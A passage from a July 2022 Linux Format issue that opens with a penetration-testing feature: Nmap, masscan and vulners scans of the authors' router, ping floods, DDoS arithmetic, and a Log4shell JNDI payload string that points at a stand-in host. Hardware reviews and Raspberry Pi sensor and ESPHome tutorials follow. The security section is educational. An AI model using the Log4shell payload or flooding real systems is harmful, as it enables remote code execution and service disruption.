wildcards or subnet masks. Just a small caveat though:
the Pi 4 uses a different Ethernet adapter than its
predecessors, so this shows up as something other than
Raspberry Pi Foundation
Spotting running services
Let’s forget about stray Pis and consider the services
running on your own network. Looking at the previous
scan results may (depending on what the boxes on your
network are doing) reveal hosts running SSH, web
interfaces, Windows File Sharing (NetBIOS/SMB/CIFS),
remote desktop (VNC/RDP) as well as some things
you’ve probably never heard of. The services running
may be different to those listed – service names are just
assumed from the port number at this stage.
Now consider your home router. It’ll almost certainly
be running a web control panel on port 80, but there
may be all kinds of other services running. If you want to
scan every single port, you could do so with:
$ sudo nmap -p1-65535 192.168.0.1
This isn’t particularly smart, though. Nmap’s default
SYN scan may be stealthy, but it’s not fast at scanning
closed ports. Those ports might reject the incoming SYN
packets, in which case the scan will finish quickly. Or the
connection attempts will be silently dropped, leaving
Nmap waiting for a response that’s never coming. Or
there could be a rate-limiting firewall in effect.
If you leave the previous command running for a
while and then push Space, you’ll see a progress
estimate and an estimated time of completion. In our
case this was close to a day, so we thought we’d try a
different tool. Masscan (Information Gathering>Network
& Port Scanners) took a mere 15 minutes to tell us it
couldn’t find any services running on obscure ports.
Note the increase in the noise in our reconnaissance
so far. We started by silently spying on the network with
Etherape, did a barely detectable probe with Nmap to
find all the hosts, and now we’re picking one host and
doing thorough inspections. And it’s about to get worse.
www.linuxformat.com

We can use Nmap to perform OS and service version
detection too, though sometimes this results in
guesswork if it encounters unknown fingerprints. Our
router, the previous scan results suggest, might have a
web control panel running on port 80, and a UPnP server
running on port 5,000. Change those numbers below to
suit your situation. Running
$ nmap -A -p80,5000 192.168.0.1
told us that the web server was Lighttpd and the other
was MiniUPnpd. That your router has so many services
running (and there may be others hiding behind port-
knocking protocols) isn’t necessarily a worry in itself.
We’ve only scanned the LAN interface, in other words
from the inside. If there were so many ports open from
the outside, that would probably be cause for concern.
In order to scan it from the outside we need to know its
external IP address, which is easy to find using a website
such as https://ipinfo.io.
Exploiting a vulnerable service is usually a critical step
in any illicit computer activity. Last year’s Log4shell
vulnerability in a Java logging framework affected
thousands of applications, from Elasticsearch containers
to Minecraft servers. Unfortunately, many servers remain
unpatched, not just due to administrator laziness, but
because Log4j (the vulnerable framework) is often buried
deep within major applications’ dependencies. Research
by Rezilion (see https://bit.ly/lxf290-rezilion-research)
shows not only thousands of machines still running
vulnerable Log4j 2.x versions, but also thousands of
machines running older 1.x versions of Log4j. The 1.x
series is unmaintained, and while it might be Log4shell
proof, is vulnerable to countless other known attacks.
Deeper probing with Nmap
Besides network recon and service discovery, Nmap can
probe even further still. Thanks to its powerful script
engine (NSE), all manner of custom tasks can be
arranged. One of the most useful scripts is provided by
security group Vulners.com. It uses Nmap’s ability to
detect the versions of running services, together with
known vulnerability databases to tell you in excruciating
detail which vulnerabilities might affect the target
www.techradar.com/pro/linux
Hacker’s toolkit 2022
There are a
huge number of
tools carefully
categorised within
the Pentesting
menu. Nmap here
will be our first
port(scan) of call.
machine. Out of curiosity, we thought we’d investigate
the UPnP server running on our router:
$ nmap -p 5000 -A --script vulners 192.168.0.1
We were simply aghast to find this in the output:
| vulners:
| cpe:/a:miniupnp_project:miniupnpd:1.9:
...
| EDB-ID:43501 7.5 https://vulners.
com/exploitdb/EDB-ID:43501 *EXPLOIT*
| CVE-2017-8798 7.5 https://vulners.
com/cve/CVE-2017-8798
Looking at the links told us this was an integer
signedness error in versions 1.4-2.0 of the MiniUPnP
client, and that vulnerable systems could be exploited by
TAP INTO NMAP’S POTENTIAL
“Thanks to Nmap’s powerful
script engine (NSE), all manner of
custom tasks can be arranged.”
a Denial of Service attack. While it would be exciting
playing with the Proof of Concept (PoC) code referenced
in those links, it would be for naught. Because this is a
vulnerability in the client program, rather than the server.
This is an important distinction, because
portscanning in general can only tell you about
vulnerable services on the host. There may be plenty of
other vulnerabilities in other software running on the
target (and indeed in the human operating it), but Nmap
can’t help you with this. These scripts only check version
information (often only Nmap’s best guess at that) so
seeing output similar to the above shouldn’t be an
immediate cause for panic.
Remember that vulnerabilities may only affect
certain features of certain programs running in certain
configurations. But it’s always worth investigating, which
is where tools like Pompem (see Pentesting>Exploitation
Tools>Exploit Search) come in handy.
July 2022 LXF290 37
Hacker’s toolkit 2022
Modern hacking,
ethics and statistics
Read about the largest DDoS in history and how honing
your hacking skills might help you prevent the next one…
gerund and an infinitive walk in to the Linux
A kernel. They were hacking to learn. An awful
adaptation of a (drinking to forget) joke, but
a reasonable opener. An incredibly useful maxim from
long ago hacker lore is “don’t learn to hack, hack to
learn”. It’s worth taking some time to marinate on
this message.
For example, if you search Google for “how to hack”
or worse “how to hack gmail”, we can pretty much
guarantee you won’t find any useful information. Indeed,
you’ll probably find all sorts of spam and phishing links
that we wouldn’t recommend touching, even with
JavaScript turned off. This isn’t because search engines
are producing increasingly bad search results, but
because hackers and advertisers know the kinds of
intellects who are searching for these terms. And
unfortunately they know how to monetise them, too.
Yet there are plenty of good resources where you can
learn network reconnaissance, penetration testing and
even phishing techniques. Sites like https://tryhackme.
com, for example, will teach you these skills with a view
to learning how to defend against them. TryHackMe
makes the learning process fun by gamifying tutorials,
in some cases giving you VMs to download and intrude.
There are lessons, labs and competitions that will help
you learn everything from Metasploit to Maltego.
Armitage is a GUI
for Metasploit.
To use it make
sure you start
the Metasploit
Framework from
the System
Service menu.
38 LXF290 July 2022
A big part of hacker culture is Capture The Flag (CTF)
challenges. You might remember this one from the
playground, or later from first-person shooters such as
Unreal Tournament. The traditional idea is that teams
compete to try and capture the flags from opposing
teams’ bases and return them to their own. But the
hacker version just involves finding flags (sometimes
just empty files called flag, sometimes more interesting
items) hidden by whoever set the challenge.
Open the floodgates
We started with the ping of death, so let’s end with the
idea of a ping flood. Instead of a single malformed
packet, a huge number of legitimately sized ones are
transmitted. The idea is to overwhelm the target
machine by sending more pings than it can handle. Both
the Ping of Death and ping flooding are part of the broad
category known as Denial of Service (DoS) attacks.
On Linux some features of the ping command are
only available when they’re run as root. One such
example is the -f or flood option, which when used on
its own sends echo requests as quickly as possible. In
favourable circumstances (the attacker has significantly
more bandwidth than the defender, and the defender
has no DoS-preventing firewall), it’s possible for one
machine to cripple another this way. It’s more common,
www.linuxformat.com

however, for an attacker to use several hosts to send the
pings, making this a Distributed Denial of Service
(DDoS) attack. Ping floods are defended against by
most routers, as are SYN floods and other things.
These are detectable by one’s garden variety packet-
filtering stack.
The actual DDoS-ing is typically done by a botnet
under the attackers control. Cybercrime groups may
rent out sections of a hoard of zombie machines that
they’ve curated, or they may use that hoard directly. So
attacks have involved a huge amount of bandwidth. In
2016 DNS provider Dyn was taken offline (making many
popular websites inaccessible) as result of the Mirai
malware, which mostly infects IoT devices using default
credentials. The total bandwidth of this attack was
estimated to be in the region of 1.2Tbps. Security
commentators of the era lamented that the net had
been crippled by a telnet scanner and 36 passwords. In
November 2021, Microsoft revealed it had thwarted the
largest DDoS attack in history, topping out at 3.47Tbps.
That’s 3,000 times more data than gigabit LAN. A UDP
reflection attack was to blame, but there are plenty of
other types of DDoS attacks that are more sophisticated.
The Log4shell vulnerability took advantage of
unsanitised input and at worst enabled remote code
execution. All an attacker had to do was cause a
carefully crafted message, which looked something like
${jndi:ldap://example.com/bad_file}
to be written to a log file. Like Bash, Log4j performs
string substitution on expressions in curly brackets. In
the right circumstances, the contents of /bad_file might
be executed immediately on the server. Or the log may
be processed on another server and /bad_file executed
there later. If code execution is dodged, then an attacker
can still cause the vulnerable machine to send data
(such as environment variables or form contents) to
their machine.
False sense of security
Here we’re abusing the Java Naming and Directory
Interface’s (JNDI) ability to fetch resources via LDAP,
but other protocols can be used to. As a result a number
of related flaws were discovered soon after the first, and
a number of incomplete mitigations were circulated
initially, creating a very false sense of security. Once
compromised, machines were enrolled in botnets,
crippled with ransomware, or became unwitting
cryptocurrency miners.
It’s interesting that the Dyn attack has been
attributed (though not conclusively – all we really know
is that in 2017 three individuals aged 20-21 entered
guilty pleas relating to “significant cyber attacks”) to
disgruntled Minecraft players, and so too was Log4j.
Indeed, to exploit Log4j on a vulnerable Minecraft server,
all you needed to do was post the code snippet above
into the chat. From there it would be dutifully processed
by Log4j and if various conditions are met the attacker
would be able to execute code.
And there concludes our perennial hacker special. As
usual we’ve barely scratched the surface of the subject
matter, and indeed dealt with only a fraction of the
fantastic selection of tooling within Parrot. But hopefully
you’ve learned something. We certainly have. Many
readers will remember with fondness the old Drupal-
based Linuxformat.com site. Quite how this stayed up
www.techradar.com/pro/linux
Hacker’s toolkit 2022
for so long, and more importantly how we managed to Wireshark can
avoid invoicing for so long (13 years to be precise), is a smell packets on
your LAN from
puzzle for the ages. As we’re fans of digital history here,
miles away. Pretty
we have most of that site archived in a virtual machine. much nothing gets
And since we’re talking about hacker toolkits today we past it.
figured we’d have a go at compromising said virtual
machine. Nmap evinced that our venerable, vulnerable,
virtual machine was running the following ancient
software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7p1
and Subversion (no version number detected).
But try as we might, none of our exploits worked. We
used ZAP (the Zed Attack Proxy) from OWASP (the
Open Web Application Security Project, https://owasp.
org) to try and attack the old archive forms, but nothing.
If you’re interested, ZAP works by setting up a person
in the middle proxy that can manipulate requests
because they’re sent to the web server under
investigation, and inspect responses.
We also tried Metasploit, which would be
a whole feature (or even a bookazine) in
itself. But the ghost of our machine, it seems,
was as resilient as its former self. Ideas,
anyone? Oh and one more thing. We ask
politely that you don’t try and pentest our new
website, because you will fail and Future’s
Operations Team will hunt you down.
THE MATH OF DDOS
When you ping another machine, you send packets of a given size
(usually 64 bytes on Linux), and that machine replies with packets of
the same size. So, as much data is sent as is received. If the goal is to
saturate the target’s network bandwidth, then the attacker needs to
be able to send just a little bit more data than the target can receive.
This is also true for a SYN flood attack.
More advanced DDoS attacks take advantage of the fact that other
requests can result in much more data being returned than is sent.
The most advanced ones to date have leveraged intermediate servers
(NTP, DNS, memcached, even Quake servers) to carry out this
amplification. These ‘reflection attacks’ spoof the target’s IP address
so that the lengthy response is sent there. For UDP protocols (like
traditional DNS) this is always going to be a problem, since source
addresses can’t be directly verified. Initiating a TCP connection, on the
other hand, requires a three-way handshake that will fail if the address
is spoofed. But the connection remains ‘half-open’ for some time, and
the resources used by thousands of such half-completed connections,
form the basis of a SYN flood attack.
July 2022 LXF290 39
 Pi USER
Les Pounder
works with groups
such as the
Raspberry Pi
Foundation to help
boost people’s
maker skills.
CAUSING A
PICO SCENE
Just recently the Revision demo
party took place online and once
again I was amazed at what a
dedicated community can do
with limited hardware. The
Raspberry Pi community is no
different. From the original single
core 700MHz CPU and 512MB of
RAM came countless hobby
projects and even a pretty good
game of Quake 3.
This got me thinking: “I wonder
if the demoscene has embraced
Raspberry Pi?” After all, the
Raspberry Pi is really just an Arm-
based Linux PC. Turns out the
answer was yes and the top
demos are listed on https://bit.
ly/lxf290-pidemo.
What I wasn’t prepared to see
demoscene code running on the
Raspberry Pi Pico! With the right
mix of resistors and connectors
we can connect a Pi Pico to VGA,
HDMI, DVI and output good-
quality video. Pico niccc, by
Molive is a looping tunnel demo,
the likes of which we’ve seen on
countless machines, but we’ve
never seen it on a microcontroller.
The demo was written in C and it
takes advantage of the dual-core
CPU and the 264KB of RAM to
produce a smooth 60fps at 480p.
The Raspberry Pi Pico has
proven itself as a remarkable
piece of kit. It can emulate retro
computers (ZX Spectrum,
Commodore 64 and the BBC
Micro) and even play a great
game of Doom (I thoroughly
tested this).
Could the Raspberry Pi Pico be
the home of a new and emerging
demoscene? Let’s hope so. The
low cost and extensive selection
of programming languages
means it closely resembles the
machines of the bedroom coder.
www.techradar.com/pro/linux
Rock Pi expands
its range
Less appetising but just as filling, the China-based
Rock Pi now delivers some SBC competition.
e’re used to seeing Raspberry Pi
W competition come and go. Over the
years many boards have featured
better-looking specifications, yet have been
hamstrung with lacklustre software and
support options that disappear as fast as the
parent companies. However, one model that’s
CREDIT: RockPi
GPUs ARE GOish 299 winners!
External Pi ones.
After almost two years’ work, Pi tinkerer Jeff
Geerling has succeeded in his goal of getting
an external GPU to work on Compute Module
4’s via the carrier board’s PCIe slot. Overall, it
runs more slowly than the Pi’s built-in GPU
and the CM4 may never interact with a GPU in
a meaningful way, partly due to Broadcom’s
out-of-spec implementation of the PCIe root
complex. See https://pipci.jeffgeerling.com.
Jeff Geerling reports success in getting a PCIe GPU to
work on a Raspberry Pi Compute Module 4.
CREDIT: Jeff Geerling
stuck around is the Rock Pi, which is now
available as the Pi 4 Model C+. This is a
reduced-cost version of the Pi 4 Model B+.
The Rock Pi looks almost identical to the
Raspberry Pi 4 Model B, and is based around
the Rockchip RK3399T. This is a Big.Little Arm
design that utilises two Cortex-A72 cores,
similar to those in the Pi 4, but running at
1.5GHz. In addition there are four more “little”
cores: Cortex-A53s running at 1.4GHz. Also
appearing on the specs sheet is 4GB of RAM,
microSD and M2 storage, Gigabit LAN, WiFi
802.11ac and the 40-pin GPIO.
For software the boards can run Debian,
Ubuntu and Android with Panfrost drivers for
its Mali T860MP4 GPU. It costs $60 plus
shipping so could be worth considering if
you’re struggling to locate a genuine Pi.
That M2 storage option
is tempting in itself.
Blasted into space.
The Pi Foundation and ESA Education have
announced that 299 teams have achieved
flight status in Mission Space Lab of the
2021/22 European Astro Pi Challenge.
These teams will be the first ever to run on
the two upgraded Astro Pi units on board the
International Space Station (ISS). Find out
more at https://bit.ly/lxf290astro.
Running your
code in space!
CREDIT: ESA
July 2022 LXF290 41
 REVIEWS Emulation software

Amiberry v5.0
Les Pounder loves the Amiga – he even started his journalism career with
custom “disk magazines” on the school playground.
ini retro computers and consoles are enjoying a
IN BRIEF
Amiberry is a
M resurgence of late. Case in point? The Nintendo
Mini NES and the A500 Mini, a licenced
free Amiga miniature Commodore Amiga 500. In effect the A500
emulator that Mini is an Arm-powered Linux machine, so can’t we just
brings the build our own? The answer is yes. Step forward Amiberry
Commodore Amiberry is an optimised Amiga emulator for multiple
Amiga to the Arm-based single board computers. We tested Amiberry
Raspberry Pi. on a 8GB Raspberry Pi 4, but there are versions for the

From the Raspberry Pi 3 and 32-/64-bit OSes. Installation was
comprehensive simple, if a little involved. Downloading the Amiberry
and densely release from the website, extracting the contents to a new
packed menu directory and then installing the required dependencies
we can create was easy. The “gotcha” issue was the latest Raspberry Pi
custom, and OS (April 2022) using the KMS driver. Amiberry requires
expensive FKMS (Fake KMS) to run and in the past we would just
Amiga “dream enable this in the Raspberry Pi Configuration tool, but not
machines”. At any more. All it took was a quick edit to our config.txt file
the other end of to enable FKMS, a reboot and we were in business.
the scale we can
quickly fire up Create a custom Amiga
an Amiga 500 Amiberry’s user interface is densely packed, but if you
and play the just want to set up a quick game, then the Quickstart
best games of menu should have you covered. If you want to create
the era, all from your ideal Amiga setup then you can tweak your RAM,
a Raspberry Pi. CPU, ROMs and expansion cards all from the menu.
When you have your machine as you want it, you can
save it as a custom configuration, ready for use.
We tested this feature by making our own Amiga 1200
with 8MB of Fast RAM, 2MB of Chip RAM, a 68030 CPU
and a 100MB IDE hard drive. With Amiberry we can create
virtual hard drives (hardfiles, HDF) This setup would have
run into the thousands, but today it costs us a Raspberry
Pi 4. We booted to the operating system (Workbench 3.1)
and proceeded to install the OS to the hard drive.
After 10 minutes of disk swapping (press F12 and then
go to the Floppy menu to change Amiga disk images,
ADF) we rebooted the machine and booted from our
fresh Workbench 3.1 hard disk install. We then spent a
little time tinkering with the OS, bumping the display
CREDIT: Codemasters
Playing Cannon Fodder on our virtual Amiga 500 transported us back
to the 1990s, when the floppy disk reigned supreme.
colours to 256 (AGA chipset) and setting a custom
resolution. Then we dropped into the Amiga Shell and
tried to remember a few commands from our youth.
The Amiga was known as a games machine, and the
pinnacle of compatibility was the Amiga 500. We created
a new configuration: an Amiga 500 with 1MB of Chip RAM
and a Kickstart 1.3 ROM. We loaded Cannon Fodder and
our muscle memory kicked in as we fought the baddies.
USB joypads/joysticks are supported and these can be
configure for use with games.
Installing games to the hard drive is a tricky task. Some
games come with installers, such as The Secret of Monkey
Island, but others require a patch. WHDLoad is the patch
and with this we can patch a game to run from the hard
drive. Amiberry supports WHDLoad, so we can build an
archive of games on our custom Amiga.
So who is Amiberry for? People like us, who grew up in
the era of the Amiga and want to reminisce without
developing tennis elbow from swapping disks. Sure, we
can go out and spend £120 on The A500 Mini, but with
Amiberry and a little patience we can make our dream
Amiga come true.

VERDICT
DEVELOPER: Blitter Studio
WEB: https://blitterstudio.com/amiberry
LICENCE: GPL-3.0

FEATURES 9/10 EASE OF USE 8/10

Amiberry’s menu PERFORMANCE 9/10 DOCUMENTATION 9/10
is packed with
features. You can After a brief struggle, Amiberry installed and worked well.
really go to town, You can build dream Amigas or relive your youth. All via a Pi.
building a dream
machine. Many
just want to play Rating 9/10
Turrican again.

42 LXF290 July 2022 www.linuxformat.com


Pimoroni Servo 2040
Achieve precise motion control from Les Pounder’s tiny package.
SPEC
owered by the RP2040, a chip that’s beating the
SoC: RP2040,
P current chip shortage, Servo 2040 wears its
purpose on its sleeve. Designed to control up to
dual-core Arm 18 servos, and work with up to six analog inputs, this is a
Cortex M0+ serious board backed up by a well-crafted software library.
133MHz Servo 2040 is a densely packed board. It’s slightly
Memory: longer and almost double the width of a Raspberry Pi
264kB of SRAM Pico. The 18 servo outputs feature three pins for each
Storage: 2MB output. The pins are the Signal, Voltage and GND
of QSPI flash connection, and servos tend to have colour-coded
GPIO: 18x servo, connectors to show orientation. The headers are typical
6x analog 2.54mm pitch and we can easily connect 18 servos,
sensors, Qw/ST creating noodles of servo cables across your bench.
Stemma QT/ We tested the Pimoroni Servo 2040 using
Qwiic connector MicroPython and CircuitPython. Pimoroni has created a
Unsoldered: new version of its MicroPython release, which provides
3x analog support for Servo 2040. The MicroPython modules for
inputs, I2C, Servo 2040 are well documented and robust.
Debug, 5V, 3V3, For our MicroPython test, we chose to use Pimoroni’s
Boot, Reset version, which also supports CircuitPython libraries.
Extras: V/I We wanted to test a few Stemma QT devices with
sensing, MicroPython and this seemed like a great fit. We ran
6x WS2812/ through Pimoroni’s examples, testing single and multiple
NeoPixels, boot/ servos. Everything went extremely smoothly.
user button,
reset button Practical experiments
PSU: USB-C 5V, We tested a series of cheap SG90 plastic geared servos
screw terminal and found that Servo 2040 was able to control each of
10A max them with a high degree of accuracy. We also tested an
Size: 62x42mm MG90S servo, a higher quality metal servo, and this also
worked well. These two servos have only 180 degrees of
movement so we installed two LEGO-compatible
continuous servos. They work in a similar manner to a
DC motor, but are slower and more precise. Our
continuous servos also worked with no issues.
To take the tests further, we connected a 10K Ohm
potentiometer and one of the analog inputs. Using a little
maths and Servo 2040’s API, we created a crude speed
controller for the continuous servos.
We also connected an Adafruit MPR121 capacitive
touch board via the QW/ST connector and loaded the
corresponding Python dependencies (Adafruit Bus and
the MPR121 module) and changed the I2C pins to match
those of the Servo RP2040. Sadly we couldn’t get this to
We’re big – ahem –
fans of this board.
www.techradar.com/pro/linux
Servo controller REVIEWS
The 2040-based board is your go-to choice for servo control.
work – the I2C pins weren’t detected. An issue has been
raised and hopefully this will be fixed in the future.
We scanned the list of Stemma QT devices supported
by Pimoroni’s MicroPython build and noted that the
BME688 was there. We connected and wrote a test script
to confirm that we could obtain the temperature, proving
that the QWST connector was working to spec.
This quick win fuelled our need to prove that Servo
2040 could work with more Stemma QT boards, so we
downloaded a beta version of CircuitPython 7 for the
Servo 2040. The info page stated we could only control 16
servos versus MicroPython’s 18 – an acceptable loss. We
tested a series of CircuitPython examples and everything
worked as expected. It was only when we tested our
continuous servos that we noticed they never stopped.
CircuitPython handles this type of servo a little differently
and, with a tweak to our code, we were good to go.
We tested the QWST connector with an MPR121,
installing the dependencies and tweaking some example
code so that touching the MPR121 inputs controlled two
servos. Everything worked – it looks like CircuitPython is
a viable alternative to MicroPython for this board. Note
that the MicroPython release is from Pimoroni and, as
such, it has a much more granular level of servo control.
CircuitPython is much more of a general purpose
alternative. If you need Stemma QT/Qwiic and can afford
to lose two servos, then go for it.
VERDICT
DEVELOPER: Pimoroni
WEB: https://shop.pimoroni.com
PRICE: £24
FEATURES 10/10 EASE OF USE 8/10
PERFORMANCE 10/10 VALUE 9/10
MicroPython and CircuitPython is a great combo.
For those that need a tiny robot platform, this is it.
Rating 9/10
July 2020 LXF290 43
 TUTORIALS Acquire sensor data

SENSORS

Cheaper sense and

sensor-abilities
The ever-frugal Les Pounder reveals how two of the cheapest sensors
on the market can bring a wealth of data to your Raspberry Pi project.

he electronics world has many different, cheap

T and simple sensors that we can use to gather

temperature data. We’ve chosen two models
that meet all of those categories, and will show you how
to use them with just a few lines of Python.

OUR Project 1: DHT11 sensor

The DHT11 is often bundled in electronics kits for the
EXPERT Raspberry Pi and Arduino. It’s accurate to within five per
Les Pounder cent between 20 and 80 per cent humidity, and ±2°C
is the under-paid between 0 and 50°C. This makes it a great hobby
associate editor sensor, but not ideal for projects that require precision.
at Tom’s There are two versions of the DHT11: a basic version The DS18B20 and DHT11 are two cheap, simple-to-use temperature
Hardware and a with no pull-up resistor; and our version, which has an sensors. They can even work side-by-side for added data collection.
freelance maker integrated resistor. If you can, buy this version.
for hire. Wiring up the sensor involves three female to female The code to read the temperature sensor is simple.
jumper wires. Looking at the front of the sensor (the In a new file we import three modules. The first is the

YOU NEED
blue plastic cage) the first pin is VCC that connects to underlying GPIO module, enabling Python to work with
the 3.3V pin on the Raspberry Pi. The next is a data the GPIO. Then we import the DHT11 module, and finally
Any Pi output pin – this connects to GPIO14 on the Raspberry we import the sleep function from the time module.
model Pi. Finally, we have a GND pin that can connect to any import RPi.GPIO as GPIO
The latest GND pin on the Pi. If you’re using a DHT11 with no import dht11
Pi OS onboard resistor then you’ll need to connect a 4.7K from time import sleep
DHT11 Ohm resistor from the DHT11’s VCC pin to the data The next three lines will reduce the verbosity of the
temperature output pin, effectively pulling the pin high. This is fiddly, output from the GPIO module. Then we set the GPIO to
sensor so make sure to buy a DHT11 with a resistor. use the Broadcom (BCM) pin numbering system. This
3x female Power up your Pi and open a terminal .Now you’re is the default used by the Raspberry Pi Foundation’s
to female ready to install the DHT11 Python library using the pip documentation. We then ensure that the GPIO is
jumper wires package manager: cleaned up and ready for use.
DS18B20 $ pip install dht11 GPIO.setwarnings(False)
temperature When the install is complete, close the terminal and GPIO.setmode(GPIO.BCM)
sensor open up the Thonny Python editor. GPIO.cleanup()
4.7K Ohm Next we create an instance that connects our Python
resistor code to the DHT11 on pin GPIO14.
(Yellow instance = dht11.DHT11(pin = 14)
Purple Red To constantly read the DHT11 we use a while True
Gold) loop and in there we create an object, result, that will
Breadboard store the data read from the DHT11.
3x male while True:
to female result = instance.read()
jumper wire If the data stored in the result object is valid we use
Code and the print function to print the temperature and humidity
diagrams at in a sentence. Note that we use %.1f as a placeholder to
https://bit. format drop in the data stored in the tuple at the end of
ly/lxf290- Three wires is all we need to connect the DHT11 to our Raspberry Pi. the line. The tuple contains the two values of
sensors Buy a DHT11 with a built-in resistor – they’re much easier to work with. temperature and humidity.

44 LXF290 July 2022 www.linuxformat.com


if result.is_valid():
print('The temperature is: %.1f Celsius and the
humidity is %.1f %%’ % (result.temperature, result.
humidity))
If the data stored in the result object is not valid the
else condition is activated, printing an error code to the
Python shell. The code then sleeps for one second
before looping back to the start.
else:
print("Error: %d” % result.error_code)
sleep(1)
Save the code as dht-11-test.py and click Run to start.
You should see the current temperature scroll in the
Python shell.
Project 2: DS18B20
The DS18B20 is our favourite temperature sensor. It
comes as either a bare component, or encased in a
waterproof sleeve with a metal probe. The DS18B20 can
sense temperatures between -55 and 125°C with ±0.5°C
accuracy from -10 to 85°C. It can’t detect humidity,
unlike the DHT11, but for temperature-based projects,
this is the sensor to use.
Wiring up the DS18B20 is a little more involved. The
bare wires of the sensor need to be inserted into a
screw terminal (one terminal per wire). The screw
terminal is then inserted into a breadboard. Next, we
need to use a 4.7K Ohm resistor with the breadboard.
Connect one leg to the red wire (VCC) and the other
to the yellow wire (data out). This will pull the data pin
high and ensure there’s a good data connection. Now
connect the GPIO of the Pi to the screw terminals via
the breadboard. Because the screw terminal inserts into
the breadboard, we can use the male to female jumper
wires to make connections. We connect the 3.3V pin to
the red screw terminal, then connect any GND to the
black wire screw terminal. We then connect GPIO4 of
the Pi to the yellow screw terminal.
Power up your Raspberry Pi and open a terminal
from where we can install the DS18B20 Python module.
For this we shall use w1thermsensor .
$ pip install w1thermsensor
Next we need to enable the one-wire interface. Go to
the main menu and click on the Raspberry Pi icon, then
go to Preferences and select Raspberry Pi
Configuration. On the new screen, click on Interfaces
and then enable the 1-Wire option. Click OK and reboot
the Raspberry Pi for the changes to take effect.
Open up the Thonny Python editor and in a new file
we’ll build a quick test script.
We start by importing two modules. The time library
will be used to slow the pace of the code. We then
import the W1ThermSensor class from the
w1thermsensor module.
import time
from w1thermsensor import W1ThermSensor
Create an object, sensor, which is used to connect
our code to the DS18B20. It’s also much easier to type!
sensor = W1ThermSensor()
Next we create a whileTrue loop to constantly check
the temperature.
while True:
GET YOUR Pi FILLING HERE Subscribe now at http://bit.ly/LinuxFormat
www.techradar.com/pro/linux
Acquire sensor data TUTORIALS
The DS18B20 is a
classic sensor. With
the waterproof
model we can
measure the
temperature of
liquids and use
that data in graphs,
or even Minecraft!
temperature = sensor.get_temperature()
Print the temperature to the Python shell. We use a
formatting trick – %s – to format the temperature data The DS18B20
into a string. Finally, we pause the code for one second needs screw
before the loop repeats. terminals for
print("The temperature is %s celsius” % breadboard use,
otherwise the
temperature)
fragile wires will
time.sleep(1)
break. Another
Save the code as ds18b20-test.py and click Run to approach is to
start the code. The Python shell should soon fill up with use ferrules.
temperature data. Place the DS18B20 between your These add a
fingers, or if you have the waterproof model, dip the end sheath over
in a glass of ice cold water and watch the temperature the wires and
rapidly drop. Both of the sensors used in this tutorial mechanically
are often under £5 from eBay, or even cheaper from clamp the
AliExpress if you can wait for delivery. Grab some and DS18B20 wires
in a rugged
add them to your next project. As a bonus, we’ve
enclosure.
created a project, ds18b20-dht11-combine.py, that uses
both of the sensors at once.
HAVING FUN WITH SENSE HAT
Raspberry Pi’s Sense HAT are packed with sensors including a
temperature sensor. Sense HAT features a combined temperature
and humidity sensor, accelerometer (measuring forces) gyroscope
(orientation) and a magnetometer (magnetic forces such as magnetic
north). Because the board is a HAT, it’s designed for easy use, on top
of the Raspberry Pi GPIO. This does cause a small problem: your
temperature data will be incorrect. The temperature sensor, located
on the top right of the board, will detect the heat of the HAT, which is
directly above the CPU, RAM and PCIe chip of the Raspberry Pi 4. You
can move the Sense HAT off the Raspberry Pi using a breakout board,
but this is more wires and complexity. For simple projects, the DHT11
and the DHT22 can’t be beaten. We only need three wires and a little
Python code to make the most of our sub-£5 purchase.
The Sense HAT does pack a lot of fun into the board. Along side
the sensors we have a joystick that can be mapped to act as a
keyboard, and we have a matrix of 64 RGB LED. The corresponding
Python library is also a joy to use, making short work of reading data
and displaying it on the LED matrix.
July 2022 LXF290 45
 TUTORIALS Home sensors
ESPHOME
Credit: https://esphome.io
Build your own smart
home sensors
Discover how to install micro controllers and simple electronics
to make our homes almost as smart as Matt Holder.
SPHome is a project that comes under the
E banner of Nabu Casa (the company started by
Home Assistant’s founder to provide funding for
core developers). ESPHome creates firmware for
microcontroller boards, which can communicate with
OUR Home Assistant. Communication is two-way and
microcontroller outputs can be controlled from Lovelace
EXPERT dashboards/automations as well as data from the
Matt Holder microcontroller being fed back to Home Assistant.
has been a fan of Around five years ago the ESP8266 model of
the open source microcontroller changed the world by offering a small,
methodology for cheap circuit board. These boards contain a Wi-Fi
over two decades controller, as well as support for many communication
and uses Linux standards. These boards support digital input/output,
and other tools analogue outputs, and pseudo-analogue output using
where possible. Pulse Width Modulation – PWM is a way of turning a
digital signal on and off very quickly so that the average
value appears to be less than the full voltage.
As well as General Purpose Input Output (GPIO),
these boards support I2C, SPI, one-wire serial and
various other standards. GPIO is found on a lot of
This project uses devices these days and is defined as a maximum
the Lolin D1 mini,
just 34mm across,
voltage of 3.3V for digital I/O and for analogue input too.
shown here with Be aware devices that use 5V digital signals will cause a
its GPIO pin out. failure unless additional circuitry is utilised.
Credit: www.wemos.cc
46 LXF290 July 2022
As described in the boxout (bottom right),
communication between ESPHome and Home Assistant
is reliable and is performed via an API. Data can be
encrypted, but because the data is retained on the
home network, this is probably unnecessary.
ESPHome can be run as a standalone system, but the
easiest way to use it is to add it as an Add-On in the
Add-Ons section of Home Assistant (see LXF287-289).
Navigate to Configuration>Add-Ons, Backups and
Supervisor and search for ESPHome. Once installed,
ensure that Start at boot, Watchdog, AutoUpdate and
Show in sidebar are enabled. Add-Ons are essentially
docker containers and run on the host’s operating
system. This author is able to run the operating system,
Home Assistant, ESPHome, Studio Code Server and other
add-ons in a performant manner on a Raspberry Pi 4.
Get an overview of ESPHome
Once the Add-On has been installed, open it from the
Add-Ons page and a new window will open. This is the
overview screen for ESPHome, which will display all
configured projects and the status of them, including
whether a firmware update is available and whether
the project is online or not.
Configuration files can be generated from this
configuration screen, or the Studio Code Server Add-On
can be used, which installs VSCode in a container that
can access the relevant configuration files. In addition,
firmware can be compiled and downloaded or uploaded,
and syntax checks can be performed to ensure the
file contains valid YAML syntax. YAML is sensitive to
whitespace and the number of indented characters
at the beginning of lines. Also in the GUI is the Secrets
editor, which is accessed from the three-dots menu in
the top right-hand corner of the screen. This GUI allows
for Secrets, such as passwords, API keys or Wi-Fi details
to be added to the file and then they don’t need to
appear in plain text in the configuration files.
Firmware can be installed in a number of different
